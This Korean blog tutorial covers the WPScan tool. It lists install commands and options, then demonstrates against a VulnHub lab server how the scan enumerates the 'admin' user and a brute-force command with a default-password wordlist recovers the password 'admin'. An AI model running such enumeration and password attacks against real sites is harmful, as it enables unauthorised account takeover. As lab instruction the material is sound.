Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
Tags
- Samba
- web hacking
- 취약점 스캔
- 암호해독
- smb
- 포트스캔
- 내부침투
- sql
- 해킹툴
- 모의해킹
- 침투테스트
- 취약점
- Los
- 스캔
- 스캐닝
- SQL Injection
- Kioptrix
- 해킹
- CTF
- 칼리리눅스
- 시스템 해킹
- 해킹도구
- 취약점분석
- Metasploit
- root권한
- SQLINJECTION
- load of sqlinjection
- 메타스플로잇
- 권한상승
- Hacking
Archives
- Today
- Total
감자 텃밭
[도구/Tools] WP-Scan 본문
Introduction
wordpress를 사용하는 웹 사이트에 대한 보안 취약점으루검사하고, 보안 설정을 분석하는 오픈 소스 도구이다.
현재 wordpress는 전 세계에서 가장 인기 있는 CMS이다. 현재 작성일 기준으로 wordpress의 시장 점유율은 64.3%로 아주 높은 점유율로 독과점 지위를 차지하고 있다.
설치 방법
sudo apt install wpscan
기본적인 사용법
wordpress를 사용하는 웹 사이트를 스캔하기 위한 기본적인 명령어는 아래와 같다.
wpscan --url <http://target.com>
주요 옵션
각 옵션은 약자로 사용이 가능하다 : —enumerate-u → -e u
옵션 설명
--url | 대상 웹사이트의 URL 지정 |
--enumerate | 테마, 플러그인, 사용자 등을 열거하는 옵션 |
--plugins-detection | 플러그인 감지 옵션 |
--themes-detection | 테마 감지 옵션 |
--wp-version | 워드프레스 버전 감지 옵션 |
--enumerate-vul | 취약점 검사 및 열거 옵션 |
--enumerate-p | 플러그인 관련 정보 열거 옵션 |
--enumerate-t | 테마 관련 정보 열거 옵션 |
--enumerate-u | 사용자 관련 정보 열거 옵션 |
--enumerate-s | 검색 엔진 디렉터리 및 파일 열거 옵션 |
--follow-redirection | 리디렉션을 따라가는 옵션 |
--proxy | 프록시 서버 설정 옵션 |
exmple
“해당 시연은 vulnhub에서 제공하는 서버를 대상으로 수행”
______________________________________________________________
__ _______ _____
\\ \\ / / __ \\ / ____|
\\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®
\\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\
\\ /\\ / | | ____) | (__| (_| | | | |
\\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: [172.30.1.15]
[+] Started: Wed Sep 20 23:26:50 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled:
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found:
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled:
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled:
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 4.9.23 identified (Outdated, released on 2023-05-16).
| Found By: Emoji Settings (Passive Detection)
| - , Match: '-release.min.js?ver=4.9.23'
| Confirmed By: Meta Generator (Passive Detection)
| - , Match: 'WordPress 4.9.23'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===========================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>
[+] Finished: Wed Sep 20 23:26:51 2023
[+] Requests Done: 24
[+] Cached Requests: 29
[+] Data Sent: 6.362 KB
[+] Data Received: 122.319 KB
[+] Memory used: 155.508 MB
[+] Elapsed time: 00:00:00
admin 이라는 계정이 존재한다는 걸 알 수 있으며, 이를 통해 무차별 대입연계를 하여
패스워드를 추출 할 수 있다.
wpscan --url <http://172.30.1.15/secret> --usernames admin --passwords /usr/share/wordlists/metasploit/http_default_pass.txt --max-threads 20
[+] URL: [172.30.1.15]
[+] Started: Wed Sep 20 23:33:11 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled:
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found:
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled:
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled:
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 4.9.23 identified (Outdated, released on 2023-05-16).
| Found By: Emoji Settings (Passive Detection)
| - , Match: '-release.min.js?ver=4.9.23'
| Confirmed By: Meta Generator (Passive Detection)
| - , Match: 'WordPress 4.9.23'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:02 <==========================================================================================> (137 / 137) 100.00% Time: 00:00:02
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / admin
Trying admin / turnkey Time: 00:00:00 <================================================ > (19 / 38) 50.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: admin
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>
[+] Finished: Wed Sep 20 23:33:15 2023
[+] Requests Done: 159
[+] Cached Requests: 30
[+] Data Sent: 43.075 KB
[+] Data Received: 86.61 KB
[+] Memory used: 207.621 MB
[+] Elapsed time: 00:00:04
패스워드까지 획득한 것을 확인할 수 있다.
※ 내용이 이상하거나 문제가 있을 경우, 또는 설명에 부족한 내용이 있으시면 알려 주시면 감사합니다.
'도구|Tools' 카테고리의 다른 글
[도구/Tools] Nikto (0) | 2023.10.04 |
---|---|
[도구/Tools] unix-privesc-check (0) | 2023.10.01 |
[도구/Tools] Nmap (0) | 2023.10.01 |
[도구/Tools] dirbuster (0) | 2023.10.01 |
[도구/Tools] NetDiscover (0) | 2023.10.01 |